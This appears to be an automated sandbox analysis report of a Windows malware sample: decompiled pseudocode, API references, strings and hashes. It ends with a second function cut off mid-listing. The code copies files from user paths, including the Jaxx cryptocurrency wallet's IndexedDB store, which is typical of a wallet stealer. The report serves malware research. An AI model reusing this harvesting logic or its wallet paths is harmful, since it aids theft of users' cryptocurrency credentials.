                                                                                				char* _t271;
                                                                                				intOrPtr _t301;
                                                                                				void* _t303;
                                                                                				void* _t305;
                                                                                				void* _t306;
                                                                                				intOrPtr _t307;
                                                                                				intOrPtr _t308;
                                                                                				intOrPtr _t309;
                                                                                				char* _t310;
                                                                                				intOrPtr _t311;
                                                                                				intOrPtr _t312;
                                                                                				char* _t313;
                                                                                				intOrPtr _t314;
                                                                                				intOrPtr _t315;
                                                                                				intOrPtr _t316;
                                                                                				intOrPtr _t317;
                                                                                				intOrPtr _t318;
                                                                                				intOrPtr _t319;
                                                                                				intOrPtr _t320;
                                                                                				intOrPtr _t321;
                                                                                				intOrPtr _t322;
                                                                                				intOrPtr _t323;
                                                                                				intOrPtr _t324;
                                                                                				intOrPtr _t325;
                                                                                				intOrPtr _t326;
                                                                                				intOrPtr _t327;
                                                                                				intOrPtr _t328;
                                                                                				intOrPtr _t329;
                                                                                				intOrPtr _t330;
                                                                                				intOrPtr _t331;
                                                                                				intOrPtr _t332;
                                                                                				intOrPtr _t333;
                                                                                				intOrPtr _t334;
                                                                                				intOrPtr _t335;
                                                                                				intOrPtr _t336;
                                                                                				intOrPtr _t337;
                                                                                				intOrPtr _t338;
                                                                                				intOrPtr _t339;
                                                                                				char* _t340;
                                                                                				char* _t341;
                                                                                				char* _t342;
                                                                                				intOrPtr _t343;
                                                                                				intOrPtr _t344;
                                                                                				intOrPtr _t345;
                                                                                				intOrPtr _t346;
                                                                                				intOrPtr _t347;
                                                                                				intOrPtr _t348;
                                                                                				intOrPtr _t349;
                                                                                				intOrPtr _t350;
                                                                                				intOrPtr _t351;
                                                                                				intOrPtr _t352;
                                                                                				intOrPtr _t353;
                                                                                				intOrPtr _t354;
                                                                                				intOrPtr _t355;
                                                                                				intOrPtr _t356;
                                                                                				intOrPtr _t357;
                                                                                				intOrPtr _t358;
                                                                                				intOrPtr _t359;
                                                                                				intOrPtr _t360;
                                                                                				intOrPtr _t361;
                                                                                				intOrPtr _t362;
                                                                                				intOrPtr _t363;
                                                                                				intOrPtr _t364;
                                                                                				intOrPtr _t365;
                                                                                				intOrPtr _t366;
                                                                                				intOrPtr _t367;
                                                                                				intOrPtr _t368;
                                                                                
                                                                                				_push(0x10);
                                                                                				E00421975(E004374C9, __ebx, __edi, __esi);
                                                                                				_t303 = __ecx;
                                                                                				 *((intOrPtr*)(_t305 - 4)) = 0;
                                                                                				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
                                                                                				E00403C13(__ecx, _t305 + 8, 0, 0xffffffff);
                                                                                				_t307 = _t306 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t307;
                                                                                				E0040C606(_t307,  *0x449cf4);
                                                                                				_t308 = _t307 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 1;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t308;
                                                                                				E0040C606(_t308,  *0x449cc4);
                                                                                				_t309 = _t308 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 2;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t309;
                                                                                				E0040C606(_t309,  *0x449e18);
                                                                                				_push(0);
                                                                                				_push(__ecx);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, __edi, __ecx, 0);
                                                                                				_t310 = _t309 - 0x1c;
                                                                                				_t239 = _t310;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t310;
                                                                                				_t301 = 0xf;
                                                                                				 *((intOrPtr*)(_t239 + 0x14)) = _t301;
                                                                                				 *((intOrPtr*)(_t239 + 0x10)) = 0;
                                                                                				 *_t239 = 0;
                                                                                				E0040381A(_t239, 0x441200);
                                                                                				_t311 = _t310 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 3;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t311;
                                                                                				E0040C606(_t311,  *0x449d80);
                                                                                				_t312 = _t311 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 4;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t312;
                                                                                				E0040C606(_t312,  *0x449dfc);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t313 = _t312 - 0x1c;
                                                                                				_t242 = _t313;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t313;
                                                                                				 *((intOrPtr*)(_t242 + 0x14)) = _t301;
                                                                                				 *((intOrPtr*)(_t242 + 0x10)) = 0;
                                                                                				 *_t242 = 0;
                                                                                				E0040381A(_t242, 0x441200);
                                                                                				_t314 = _t313 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 5;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t314;
                                                                                				E0040C606(_t314,  *0x449cb8);
                                                                                				_t315 = _t314 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 6;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t315;
                                                                                				E0040C606(_t315,  *0x449ca8);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t316 = _t315 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t316;
                                                                                				E0040C606(_t316,  *0x449f94);
                                                                                				_t317 = _t316 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 7;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t317;
                                                                                				E0040C606(_t317,  *0x449c54);
                                                                                				_t318 = _t317 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 8;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t318;
                                                                                				E0040C606(_t318,  *0x449ee4);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t319 = _t318 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t319;
                                                                                				E0040C606(_t319,  *0x449d70);
                                                                                				_t320 = _t319 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 9;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t320;
                                                                                				E0040C606(_t320,  *0x449c54);
                                                                                				_t321 = _t320 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xa;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t321;
                                                                                				E0040C606(_t321,  *0x449ee4);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t322 = _t321 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t322;
                                                                                				E0040C606(_t322,  *0x449e24);
                                                                                				_t323 = _t322 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xb;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t323;
                                                                                				E0040C606(_t323,  *0x449c54);
                                                                                				_t324 = _t323 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xc;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t324;
                                                                                				E0040C606(_t324,  *0x449c70);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t325 = _t324 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t325;
                                                                                				E0040C606(_t325,  *0x449f58);
                                                                                				_t326 = _t325 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xd;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t326;
                                                                                				E0040C606(_t326,  *0x449c54);
                                                                                				_t327 = _t326 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xe;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t327;
                                                                                				E0040C606(_t327,  *0x449c70);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t328 = _t327 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t328;
                                                                                				E0040C606(_t328,  *0x449f6c);
                                                                                				_t329 = _t328 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xf;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t329;
                                                                                				E0040C606(_t329,  *0x449c54);
                                                                                				_t330 = _t329 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x10;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t330;
                                                                                				E0040C606(_t330,  *0x449c70);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t331 = _t330 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t331;
                                                                                				E0040C606(_t331,  *0x449f48);
                                                                                				_t332 = _t331 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x11;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t332;
                                                                                				E0040C606(_t332,  *0x449f80);
                                                                                				_t333 = _t332 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x12;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t333;
                                                                                				E0040C606(_t333,  *0x449e94);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t334 = _t333 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t334;
                                                                                				E0040C606(_t334,  *0x449e84);
                                                                                				_t335 = _t334 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x13;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t335;
                                                                                				E0040C606(_t335,  *0x449fdc);
                                                                                				_t336 = _t335 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x14;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t336;
                                                                                				E0040C606(_t336,  *0x449d18);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t337 = _t336 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t337;
                                                                                				E0040C606(_t337,  *0x449c38);
                                                                                				_t338 = _t337 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x15;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t338;
                                                                                				E0040C606(_t338,  *0x449de8);
                                                                                				_t339 = _t338 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x16;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t339;
                                                                                				E0040C606(_t339,  *0x449f38);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t340 = _t339 - 0x1c;
                                                                                				_t269 = _t340;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t340;
                                                                                				 *((intOrPtr*)(_t269 + 0x14)) = _t301;
                                                                                				 *((intOrPtr*)(_t269 + 0x10)) = 0;
                                                                                				 *_t269 = 0;
                                                                                				E0040381A(_t269, "*.*");
                                                                                				_t341 = _t340 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x17;
                                                                                				_t270 = _t341;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t341;
                                                                                				 *((intOrPtr*)(_t270 + 0x14)) = _t301;
                                                                                				 *((intOrPtr*)(_t270 + 0x10)) = 0;
                                                                                				 *_t270 = 0;
                                                                                				E0040381A(_t270, "Jaxx_New");
                                                                                				_t342 = _t341 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x18;
                                                                                				_t271 = _t342;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t342;
                                                                                				 *((intOrPtr*)(_t271 + 0x14)) = _t301;
                                                                                				 *((intOrPtr*)(_t271 + 0x10)) = 0;
                                                                                				 *_t271 = 0;
                                                                                				E0040381A(_t271, "\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb\\");
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t343 = _t342 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t343;
                                                                                				E0040C606(_t343,  *0x449f68);
                                                                                				_t344 = _t343 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x19;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t344;
                                                                                				E0040C606(_t344,  *0x449d34);
                                                                                				_t345 = _t344 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1a;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t345;
                                                                                				E0040C606(_t345,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t346 = _t345 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t346;
                                                                                				E0040C606(_t346,  *0x449b80);
                                                                                				_t347 = _t346 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1b;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t347;
                                                                                				E0040C606(_t347,  *0x449d34);
                                                                                				_t348 = _t347 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t348;
                                                                                				E0040C606(_t348,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t349 = _t348 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t349;
                                                                                				E0040C606(_t349,  *0x449c04);
                                                                                				_t350 = _t349 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1d;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t350;
                                                                                				E0040C606(_t350,  *0x449d34);
                                                                                				_t351 = _t350 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1e;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t351;
                                                                                				E0040C606(_t351,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t352 = _t351 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t352;
                                                                                				E0040C606(_t352,  *0x449ea0);
                                                                                				_t353 = _t352 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1f;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t353;
                                                                                				E0040C606(_t353,  *0x449d34);
                                                                                				_t354 = _t353 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x20;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t354;
                                                                                				E0040C606(_t354,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t355 = _t354 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t355;
                                                                                				E0040C606(_t355,  *0x449c60);
                                                                                				_t356 = _t355 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x21;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t356;
                                                                                				E0040C606(_t356,  *0x449d34);
                                                                                				_t357 = _t356 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x22;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t357;
                                                                                				E0040C606(_t357,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t358 = _t357 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t358;
                                                                                				E0040C606(_t358,  *0x449d84);
                                                                                				_t359 = _t358 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x23;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t359;
                                                                                				E0040C606(_t359,  *0x449d34);
                                                                                				_t360 = _t359 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x24;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t360;
                                                                                				E0040C606(_t360,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t361 = _t360 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t361;
                                                                                				E0040C606(_t361,  *0x449f64);
                                                                                				_t362 = _t361 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x25;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t362;
                                                                                				E0040C606(_t362,  *0x449cec);
                                                                                				_t363 = _t362 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x26;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t363;
                                                                                				E0040C606(_t363,  *0x449fd8);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t364 = _t363 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t364;
                                                                                				E0040C606(_t364,  *0x449f9c);
                                                                                				_t365 = _t364 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x27;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t365;
                                                                                				E0040C606(_t365,  *0x449be8);
                                                                                				_t366 = _t365 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x28;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t366;
                                                                                				E0040C606(_t366,  *0x449c6c);
                                                                                				_push(1);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t367 = _t366 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t367;
                                                                                				E0040C606(_t367,  *0x449db8);
                                                                                				_t368 = _t367 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x29;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t368;
                                                                                				E0040C606(_t368,  *0x449be8);
                                                                                				 *((char*)(_t305 - 4)) = 0x2a;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t368 - 0x1c;
                                                                                				E0040C606(_t368 - 0x1c,  *0x449c6c);
                                                                                				_push(1);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				E00402C34(_t305 + 8, 1, 0);
                                                                                				return E00421A4D( *((intOrPtr*)(_t303 + 0x1c)));
                                                                                			}










































































                                                                                0x0040dfdf
                                                                                0x0040dfe4
                                                                                0x0040dfe7
                                                                                0x0040dfed
                                                                                0x0040dff6
                                                                                0x0040dffb
                                                                                0x0040dffe
                                                                                0x0040e004
                                                                                0x0040e00d
                                                                                0x0040e012
                                                                                0x0040e013
                                                                                0x0040e014
                                                                                0x0040e017
                                                                                0x0040e01c
                                                                                0x0040e021
                                                                                0x0040e02a
                                                                                0x0040e02f
                                                                                0x0040e032
                                                                                0x0040e038
                                                                                0x0040e041
                                                                                0x0040e046
                                                                                0x0040e049
                                                                                0x0040e04f
                                                                                0x0040e058
                                                                                0x0040e05d
                                                                                0x0040e05e
                                                                                0x0040e05f
                                                                                0x0040e062
                                                                                0x0040e067
                                                                                0x0040e06c
                                                                                0x0040e075
                                                                                0x0040e07a
                                                                                0x0040e07d
                                                                                0x0040e083
                                                                                0x0040e08c
                                                                                0x0040e091
                                                                                0x0040e094
                                                                                0x0040e09a
                                                                                0x0040e0a3
                                                                                0x0040e0a8
                                                                                0x0040e0a9
                                                                                0x0040e0aa
                                                                                0x0040e0ad
                                                                                0x0040e0b2
                                                                                0x0040e0b7
                                                                                0x0040e0c0
                                                                                0x0040e0c5
                                                                                0x0040e0c8
                                                                                0x0040e0ce
                                                                                0x0040e0d7
                                                                                0x0040e0dc
                                                                                0x0040e0df
                                                                                0x0040e0e5
                                                                                0x0040e0ee
                                                                                0x0040e0f3
                                                                                0x0040e0f4
                                                                                0x0040e0f5
                                                                                0x0040e0f8
                                                                                0x0040e0fd
                                                                                0x0040e102
                                                                                0x0040e10b
                                                                                0x0040e110
                                                                                0x0040e113
                                                                                0x0040e119
                                                                                0x0040e122
                                                                                0x0040e127
                                                                                0x0040e12a
                                                                                0x0040e130
                                                                                0x0040e139
                                                                                0x0040e13e
                                                                                0x0040e13f
                                                                                0x0040e140
                                                                                0x0040e143
                                                                                0x0040e148
                                                                                0x0040e14d
                                                                                0x0040e156
                                                                                0x0040e15b
                                                                                0x0040e15e
                                                                                0x0040e164
                                                                                0x0040e16d
                                                                                0x0040e172
                                                                                0x0040e175
                                                                                0x0040e17b
                                                                                0x0040e184
                                                                                0x0040e189
                                                                                0x0040e18a
                                                                                0x0040e18b
                                                                                0x0040e18e
                                                                                0x0040e193
                                                                                0x0040e198
                                                                                0x0040e1a1
                                                                                0x0040e1a6
                                                                                0x0040e1a9
                                                                                0x0040e1af
                                                                                0x0040e1b8
                                                                                0x0040e1bd
                                                                                0x0040e1c0
                                                                                0x0040e1c6
                                                                                0x0040e1cf
                                                                                0x0040e1d4
                                                                                0x0040e1d6
                                                                                0x0040e1d7
                                                                                0x0040e1da
                                                                                0x0040e1df
                                                                                0x0040e1e4
                                                                                0x0040e1ed
                                                                                0x0040e1f2
                                                                                0x0040e1f5
                                                                                0x0040e1fb
                                                                                0x0040e204
                                                                                0x0040e20c
                                                                                0x0040e212
                                                                                0x0040e21b
                                                                                0x0040e220
                                                                                0x0040e222
                                                                                0x0040e223
                                                                                0x0040e226
                                                                                0x0040e234
                                                                                0x0040e240

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0040DBC1
                                                                                  • Part of subcall function 00403C13: std::_Xinvalid_argument.LIBCPMT ref: 00403C2D
                                                                                  • Part of subcall function 0040D762: __EH_prolog3_GS.LIBCMT ref: 0040D76C
                                                                                  • Part of subcall function 0040D762: __wgetenv.LIBCMT ref: 0040D7A3
                                                                                  • Part of subcall function 0040D762: GetFileAttributesW.KERNEL32(00000000,?,?,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040D91F
                                                                                  • Part of subcall function 0040D762: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000001,00000000,?,?,?,?,00000000), ref: 0040D9B1
                                                                                  • Part of subcall function 0040D762: CopyFileW.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000001,00000000,00000001,00000000,?,?,?,?,00000000), ref: 0040DAA1
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCopyCreateDirectoryH_prolog3H_prolog3_Xinvalid_argument__wgetenv_memmovestd::_
                                                                                • String ID: *$*.*$Jaxx_New$\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                                                                                • API String ID: 290217350-2103950858
                                                                                • Opcode ID: caa5b19ec0c3c496e99b47f8301448a62473dfd3b8b22cb05e174c5c020ebacb
                                                                                • Instruction ID: 05a260073a854c815c53b6d5365e35fc3c66cc9d62196e6e4635d6c501dac989
                                                                                • Opcode Fuzzy Hash: caa5b19ec0c3c496e99b47f8301448a62473dfd3b8b22cb05e174c5c020ebacb
                                                                                • Instruction Fuzzy Hash: D9123370D01285EACB11BF7DCA4759E7EB59B06344F2401AEF401376A2C67A4F18A7EE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00418889(void* __ebx, intOrPtr __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t219;
                                                                                				intOrPtr* _t220;
                                                                                				intOrPtr _t226;
                                                                                				signed int _t232;
                                                                                				char* _t233;
                                                                                				void* _t237;
                                                                                				signed int _t239;
                                                                                				void* _t241;
                                                                                				void* _t242;
                                                                                				intOrPtr* _t245;
                                                                                				intOrPtr* _t246;
                                                                                				intOrPtr* _t258;
                                                                                				intOrPtr* _t259;
                                                                                				intOrPtr* _t261;
                                                                                				intOrPtr _t263;
                                                                                				intOrPtr* _t269;
                                                                                				intOrPtr* _t270;
                                                                                				intOrPtr* _t274;
                                                                                				intOrPtr* _t275;
                                                                                				signed int _t277;
                                                                                				intOrPtr* _t278;
                                                                                				intOrPtr* _t281;
                                                                                				char* _t283;
                                                                                				intOrPtr _t289;
                                                                                				signed int _t291;
                                                                                				intOrPtr _t292;
                                                                                				signed int _t294;
                                                                                				char* _t296;
                                                                                				intOrPtr _t301;
                                                                                				signed int _t303;
                                                                                				intOrPtr* _t305;
                                                                                				intOrPtr* _t313;
                                                                                				intOrPtr _t314;
                                                                                				char* _t324;
                                                                                				intOrPtr* _t344;
                                                                                				void* _t352;
                                                                                				intOrPtr* _t355;
                                                                                				void* _t365;
                                                                                				void* _t370;
                                                                                				void* _t371;
                                                                                				void* _t373;
                                                                                				void* _t374;
                                                                                				void* _t375;
                                                                                				void* _t379;
                                                                                				void* _t382;
                                                                                				intOrPtr _t397;
                                                                                
                                                                                				_t382 = __eflags;
                                                                                				E004219DE(E00435DE0, __ebx, __edi, __esi);
                                                                                				 *((char*)(_t370 - 0x7c)) =  *((intOrPtr*)(_t370 + 0xc));
                                                                                				 *(_t370 - 0x5c) =  *(_t370 + 0x10);
                                                                                				 *(_t370 - 0x64) =  *(_t370 + 0x14);
                                                                                				 *(_t370 - 0x58) =  *(_t370 + 0x18);
                                                                                				_t301 = __ecx;
                                                                                				_t344 = __edx;
                                                                                				 *((intOrPtr*)(_t370 - 0x4c)) =  *((intOrPtr*)(_t370 + 0x1c));
                                                                                				 *((intOrPtr*)(_t370 - 0x80)) = __ecx;
                                                                                				 *((intOrPtr*)(_t370 - 0x50)) = __edx;
                                                                                				_t219 = E0040F3F7(__ecx, _t370 - 0x8c);
                                                                                				 *(_t370 - 4) =  *(_t370 - 4) & 0x00000000;
                                                                                				_t220 = E004191E8(_t301, __edx, _t370 - 0x8c, _t382);
                                                                                				 *(_t370 - 4) =  *(_t370 - 4) | 0xffffffff;
                                                                                				_t355 = _t220;
                                                                                				 *((intOrPtr*)(_t370 - 0x74)) = _t355;
                                                                                				E00407D49(_t370 - 0x8c);
                                                                                				E00419135(_t355, _t370 - 0x48);
                                                                                				 *(_t370 - 4) = 1;
                                                                                				_t313 = _t355;
                                                                                				 *((char*)(_t370 - 0x70)) =  *((intOrPtr*)( *_t355 + 8))(_t219, 0x84);
                                                                                				 *((intOrPtr*)(_t370 - 0x18)) = 0xf;
                                                                                				 *((intOrPtr*)(_t370 - 0x1c)) = 0;
                                                                                				 *((char*)(_t370 - 0x2c)) = 0;
                                                                                				 *(_t370 - 4) = 2;
                                                                                				_t226 =  *_t344;
                                                                                				if(_t226 == 0x2b) {
                                                                                					L2:
                                                                                					 *(_t370 - 0x84) = 1;
                                                                                					L3:
                                                                                					 *((char*)(_t370 - 0x60)) =  *((intOrPtr*)( *((intOrPtr*)(E00420F19(_t301, 0, _t384)))));
                                                                                					 *((short*)(_t370 - 0x5f)) = 0x65;
                                                                                					 *(_t370 - 0x54) = E0041F230(_t344, 0x65,  *((intOrPtr*)(_t370 - 0x4c)));
                                                                                					_t232 = E0041F230(_t344,  *((char*)(_t370 - 0x60)),  *((intOrPtr*)(_t370 - 0x4c)));
                                                                                					_t373 = _t371 + 0x18;
                                                                                					 *(_t370 - 0x68) = _t232;
                                                                                					if(_t232 == 0) {
                                                                                						 *(_t370 - 0x58) = 0;
                                                                                					}
                                                                                					_t233 =  *((intOrPtr*)(_t370 - 0x48));
                                                                                					if( *((intOrPtr*)(_t370 - 0x34)) < 0x10) {
                                                                                						_t233 = _t370 - 0x48;
                                                                                					}
                                                                                					if( *_t233 == 0x7f) {
                                                                                						L32:
                                                                                						_t314 =  *((intOrPtr*)(_t301 + 0x20));
